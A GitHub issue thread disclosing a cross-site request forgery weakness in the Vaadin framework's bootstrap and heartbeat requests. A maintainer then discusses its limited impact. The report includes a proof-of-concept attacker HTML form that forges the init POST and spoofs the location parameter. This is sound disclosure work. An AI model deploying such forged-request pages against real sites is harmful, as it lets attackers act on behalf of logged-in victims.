### ISSUE TITLE
Security: Cross site request forgery vulnerability, lack of csrfToken

### ISSUE THREAD

**Issue by mobstef** [vaadin/framework#9471]
The problem has been observed in Vaadin 7.7.3, but it seems not to be fixed in future versions.

After a successful login, a POST request is sent (by "vaadinBootstrap.js") in order to initialize the application. This POST request contains predictable parameters and values and will be authorized by the application in case the request includes valid session cookies.  As such, an attacker knowing the required POST parameters can mount a malicious website and trick a logged in user to visit it. Once the logged-in user visits the attacker website, a request to the targeted URL is performed which will contain the session cookies of the victim. The application will thus authorize the request as if it was requested by the victim, while it was actually triggered by visiting the attacker website.

1. The attacker sets up a website containing the following code:
```html
<html>
<head>
</head>
<body>
<form action="/example" method="POST">
<input type="hidden" name="v-browserDetails" value="1"/>
<input type="hidden" name="theme" value="example"/>
<input type="hidden" name="v-appId" value="example-1241384232"/>
<input type="hidden" name="v-sh" value="1080"/>
<input type="hidden" name="v-sw" value="1920"/>
<input type="hidden" name="v-cw" value="1920"/>
<input type="hidden" name="v-ch" value="868"/>
<input type="hidden" name="v-curdate" value="1485357608031"/>
<input type="hidden" name="v-tzo" value="-60"/>
<input type="hidden" name="v-dstd" value="60"/>
<input type="hidden" name="v-rtzo" value="-60"/>
<input type="hidden" name="v-dston" value="false"/>
<input type="hidden" name="v-vw" value="1920"/>
<input type="hidden" name="v-vh" value="0"/>
<input type="hidden" name="v-loc" value="https%3A%2F%2Fwww.google.com"/>
<input type="hidden" name="v-wn" value="example-1241384232-0.03542973047628717"/>
<input type="submit" value="Submit"/>
</form>
</body>
</html>
```
2. The victim visits the website and submits the form. Note that the form submission can be automated by the attacker. The request is then issued to Vaadin application and a successful response is returned, which contains the modified v-loc parameter. The `Page.getCurrent().getLocation()` will contain the link to possible malicious website and can be used by unaware Vaadin application developer for redirects. Other parameters could also potentially be exploited.

Although less severe, the potential problem also concerns heartbeat.

Recommendation:
"crsfToken" should be generated and validated for these requests as it is done for JSON requests.

**Comment by Legioth** [comment]
Thank you for reporting this!

Is there anything else that this vulnerability can be used for in addition to spoofing `Page.getCurrent().getLocation() ` so that careless redirects triggered through `UI.init()` might have an unintended effect? The risk of such a redirect is quite minimal since a regular "redirect" in that context would use Vaadin APIs to put redirect instructions in the response JSON instead of triggering an actual HTTP 30x redirect in the response.

An UI instance will be created on the server on behalf of the user, but that UI will after that not be useful for anything since nobody will be reading the response and any further actions in the context of that UI instance would require knowing the CSRF token.

Regarding heartbeats, those should again in theory be completely harmless since they are never directly used for triggering any specific action based on information in the request. A heartbeat request might cause side effects, but a malicious request can only affect the timing of when those side effects happen.

With that being said, there might still be some potential cases that I haven't foreseen right now, so we should still consider adding CSRF protection to these two types of requests just to be on the safe side.
